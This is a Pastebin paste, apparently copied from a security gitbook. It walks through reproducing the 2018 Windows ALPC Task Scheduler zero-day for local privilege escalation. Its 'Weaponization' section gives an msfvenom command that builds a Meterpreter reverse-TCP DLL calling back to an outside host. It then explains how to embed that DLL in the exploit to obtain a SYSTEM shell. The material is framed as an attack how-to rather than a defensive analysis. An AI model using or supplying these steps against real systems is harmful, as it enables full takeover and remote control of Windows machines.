API tools faq
paste
Advertisement
TVT618

How to Exploit ALPC bug zero-day?

TVT618
Aug 30th, 2018
321
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.23 KB | None | 0 0
raw download clone embed print report
  1. How to use?
  2. A zero-day for a local priv esc for Windows was published August 28th on Twitter by @sandboxescaper, whose account was pulled quickly. The PoC is on Github. The video posted with the PoC wasn't evident so @sandboxescaper made a quick reproduction to verify whether it works, and it certainly does.
  3. * As Administrator, open Process Explorer - right click, "Run as administrator"
  4. * As a regular user, launch notepad. If you opened it from cmd, you get a subprocess notepad inside cmd. This thread runs with the user context you launched it with. Note that the PID of the notepad process is 3872
  5. * If you need to see username and integrity level in Process Explorer you can go to View -> Select columns and check
  6.  
  7. Now, have a look at the process spoolsv.exe which is basically where the actions is going to happen. Nothing much here yet.
  8. Now fire the exploit off and see what happens (this is demonstrated in the PoC video). @sandboxescaper use the PID of the notepad process we spawned earlier 3872.
  9. Now, it appears that nothing is happening, but take a look at spoolsv in Process Explorer again.
  10. OH F*CK! cmd.exe with subprocesses conhost and notepad has spawned as SYSTEM!
  11.  
  12. Windows 10 - works!
  13. Zero-day priv esc confirmed on Windows 10 1803. No patch has been released by MS yet (28/08/2018)
  14. This could probably be tweaked to open an actual cmd window as SYSTEM instead of a windowless process in the background.
  15. Edit on the above: @plaintext notified @sandboxescaper that the processes spawn in session 0 which is why they won't be visible to the user which operations in session 1. If you toggle Session in the columns panel in ProcExplorer you can see that very clearly.
  16.  
  17. Server 2016 - works!
  18. Windows 7 - Nothing happens :) :) :)
  19.  
  20. Weaponization maybe?
  21. After reading the source code @sandboxescaper discovered that notepad is launched from the exploit.dll added as a Resource. This can be seen at line 101-105 in the source code.
  22.  
  23. //Payload is included as a resource, you need to modify this resource accordingly.
  24. HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
  25. unsigned int myResourceSize = ::SizeofResource(mod, myResource);
  26. HGLOBAL myResourceData = ::LoadResource(mod, myResource);
  27. void* pMyBinaryData = ::LockResource(myResourceData);
  28.  
  29. When clicking that one, we can see this exploit.dll which in the PoC just spawns notepad can't be read since @sandboxescaper don't have it in that absolute path.
  30.  
  31. So instead of recompiling and fixing the 500 errors @sandboxescaper got from visual studio @sandboxescaper decided it was easier to replace the dll directly as a Resource with CFF Explorer'. But before @sandboxescaper did that he had to prepare the payload:
  32. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.16 lport=444 -f dll -o lol.dll
  33.  
  34. Select "Replace Resource (raw)" in CFF Explorer and provide the lol.dll. Then save the ALPC-TaskSched-LPE.dll as a new file. The entire exploit is now embedded into the dll file.
  35.  
  36. So we fire of the exploit again, just like we did above and wait for our shell to come back.
  37. Woop de doo we got a SYSTEM meterpreter.
  38.  
  39. From Darth Sidious: https://hunter2.gitbook.io/darthsidious/privilege-escalation/alpc-bug-0day
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!